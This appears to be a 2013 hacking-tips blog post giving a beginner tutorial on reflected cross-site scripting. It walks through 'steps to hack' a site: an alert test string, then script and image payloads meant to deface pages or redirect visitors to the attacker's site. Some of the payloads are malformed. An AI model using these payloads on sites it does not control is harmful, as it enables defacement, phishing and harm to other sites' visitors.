» » Hack websites using Cross Site Scripting






This is the first article on website hacking on my blog. In this tutorial i am going to explain about CROSS SITE SCRIPTING ATTACK.


Cross-site scripting (XSS) is a type of computer security vulnerability typically found in web applications that enables malicious attackers to inject client-side script into web pages viewed by other users. An exploited cross-site scripting vulnerability can be used by attackers to bypass access controls such as the same origin policy.


Types of XSS vulnerabilities:


1.Persistent
2.Non persistent


In this post i am going to explain about the non persistent vulnerability.


Non persistent XSS vulnerability is the Most Common Type of XSS Flaw. It is a Server Side Vulnerability
When a Web Server takes any input from a User and returns the same back to the User without any Validation, This leads to a Non-Persistent XSS Vulnerability.


What can a hacker do with this??


XSS Attacks be used for the following:
        
        •Compromising and Hijacking Accounts
        •Stealing User Cookies
        •Defacing Websites
        •Phishing Attacks
        •Posting False or Hostile Content


Steps to hack:


Step 1: Find vulnerability.


Step 2: Deface.


Finding out the vulnerability:


1)Find a textbox in the site or something where you can submit text.




2)Type in the following:


<script>alert("hackinginception");</script>


3)If it is vulnerable it should look like this:




Defacing:


There are some ways to deface a site when you find a XSS vulnerability.


1) Makes A Picture Pop-Up:


"><script>location="www.website.com/yourdefacepic";</script>


2) Replace The Content Of The Page By An Image:


<img src="yoursite.com/yourdefacepic/>


3)Redirect To A Website


<script>window.location="http://www.yoursite.com"</script>


NOTE: 
Since this is a non-persistent attack,the changes made by you will not affect the website. But the hackers use these vulnerabilities to steal the information of the visitors of those sites. 
I will write some articles on those topics soon.


Hope you liked this article... Leave your comments if you have any doubts or suggestions.
9:54 AM

0 comments Blogger 0 Facebook

Post a Comment

Subscribe to: Post Comments (Atom)
 
LEARN HACKING TIPS AND TRICKS © 2013. All Rights Reserved.
Top